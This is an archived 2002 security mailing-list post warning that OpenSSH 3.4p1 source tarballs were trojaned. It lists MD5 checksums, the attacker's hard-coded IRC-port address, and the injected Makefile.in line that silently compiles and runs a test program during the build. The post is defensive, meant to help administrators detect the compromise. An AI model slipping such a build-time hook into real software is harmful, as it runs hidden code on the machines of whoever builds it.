Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

firewall-wizards logo Firewall Wizards mailing list archives

Re: OpenSSH 3.4p1 possibly trojaned
From: "Paul D. Robertson" <proberts () patriot net>
Date: Thu, 1 Aug 2002 08:33:09 -0400 (EDT)
On Thu, 1 Aug 2002, Paul D. Robertson wrote:


It would appear that the OpenSSH code for all the non-OpenBSD systems was 
trojaned at some point pretty recently.  I just checked the MD5 (and 
sources) of the version I put on my public-facing systems, and it's the 
same as the FreeBSD ports one (clean):

# md5sum openssh-3.4p1.tar.gz
459c1d0262e939d6432f193c7a4ba8a8  openssh-3.4p1.tar.gz

I got that copy around 19:43 Eastern on July 17th.  If you pulled a copy 
after that, it's probably worth a check.

------------------------------------------------------------------------

Things to check:

MD5 of the trojaned tar.gz: 3ac9bc346d736b4a51d676faa2a08a57

Source addition:

openssh-3.4p1/openbsd-compat/Makefile.in:
 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh 
./bf-test.out &


It looks to me as if it might try to clean this up after the source is 
built, but I don't have a test enviornment I'm willing to sacrafice at the 
moment.  If you don't have the tar.gz file to check the MD5 sum of and 
you built from source, I'd recommend getting a new copy once the trojan 
has been replaced, or grabbing a copy from somewhere like the FreeBSD 
ports collection., 


Trojan connection:

203.62.158.32:6667 (web.snsonline.net)


This address and port look to be hard coded in the trojan.  It's probably 
worth an outbound access list if you're worried- although the server seems 
to be down at the moment.

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts () patriot net      which may have no basis whatsoever in fact."
probertson () trusecure com Director of Risk Assessment TruSecure Corporation

_______________________________________________
firewall-wizards mailing list
firewall-wizards () honor icsalabs com
http://honor.icsalabs.com/mailman/listinfo/firewall-wizards

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]